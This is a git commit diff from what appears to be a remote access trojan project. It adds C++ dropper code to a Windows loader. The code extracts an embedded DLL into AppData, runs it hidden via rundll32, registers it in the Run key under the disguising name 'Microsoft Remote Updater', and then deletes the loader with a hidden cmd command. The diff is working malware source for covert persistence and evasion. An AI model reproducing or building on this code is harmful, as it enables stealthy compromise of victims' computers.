DLL now has persistance, Loader deletes itself after extracting dll and creating persistance

hellisabove
2023-07-03 20:15:14 +03:00
parent 9f4a57720b
commit e99cfca22a
22 changed files with 64 additions and 7 deletions
+4
@@ -1,2 +1,6 @@
C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Microsoft\VC\v150\Platforms\Win32\PlatformToolsets\v141_xp\Toolset.targets(39,5): warning MSB8051: Support for targeting Windows XP is deprecated and will not be present in future releases of Visual Studio. Please see https://go.microsoft.com/fwlink/?linkid=2023588 for more information.
cl : Command line warning D9025: overriding '/sdl-' with '/GS-'
loader.cpp
tools.cpp
Generating Code...
Loader.vcxproj -> C:\Users\hellisabove\source\repos\RAT\Debug\Loader.exe
+1 -1
@@ -96,7 +96,7 @@
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<AdditionalDependencies>kernel32.lib;user32.lib</AdditionalDependencies>
<AdditionalDependencies>kernel32.lib;user32.lib;advapi32.lib</AdditionalDependencies>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+49 -1
@@ -4,7 +4,7 @@
INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
PBYTE module_base = PBYTE(Tools::GetImageBase());
if (module_base != ERROR) {
// extract payload from section move to %appdata% with random name
// extract payload from section
DWORD module_size = NULL;
PBYTE dll_memory = Tools::ExtractDllFile(module_base, &module_size);
@@ -18,6 +18,54 @@ INT WINAPI WinMain(HMODULE current, HMODULE previous, LPSTR cmd, INT show) {
if (new_file != INVALID_HANDLE_VALUE) {
WriteFile(new_file, dll_memory, module_size, &bytes_written, NULL);
}
CloseHandle(new_file);
}
LocalFree(dll_memory);
// runs the dll after extraction
WCHAR win_path[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), win_path, MAX_PATH - 1) > 0) {
if (wsprintfW(win_path, TEXT("%s\\System32\\rundll32.exe "), win_path) != NULL) {
lstrcatW(win_path, appdata_path);
lstrcatW(win_path, L",");
lstrcatW(win_path, L"FunEntry");
STARTUPINFO startup_inf{ 0 };
PROCESS_INFORMATION process_information{ 0 };
startup_inf.cb = sizeof(startup_inf);
BOOL b = CreateProcessW(NULL, win_path, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &startup_inf, &process_information);
if (b) {
HKEY reg_key;
LONG bb = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &reg_key);
if (bb == ERROR_SUCCESS) {
RegSetValueEx(reg_key, L"Microsoft Remote Updater", 0, REG_SZ, (LPBYTE)win_path, sizeof(win_path));
RegCloseKey(reg_key);
}
//WaitForSingleObject(process_information.hProcess, INFINITE);
//CloseHandle(process_information.hProcess);
}
}
}
}
// delete loader
WCHAR del_cmd[MAX_PATH];
if (ExpandEnvironmentStringsW(TEXT("%WINDIR%"), del_cmd, MAX_PATH - 1) > 0) {
if (wsprintfW(del_cmd, TEXT("%s\\System32\\cmd.exe "), del_cmd) != NULL) {
WCHAR app_name[MAX_PATH];
GetModuleFileNameW(0, app_name, MAX_PATH);
lstrcatW(del_cmd, L"/c del \"");
lstrcatW(del_cmd, app_name);
lstrcatW(del_cmd, L"\"");
STARTUPINFO sii{ 0 };
PROCESS_INFORMATION pii{ 0 };
sii.cb = sizeof(sii);
CreateProcessW(NULL, del_cmd, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | CREATE_NO_WINDOW, NULL, NULL, &sii, &pii);
return 0;
}
}
}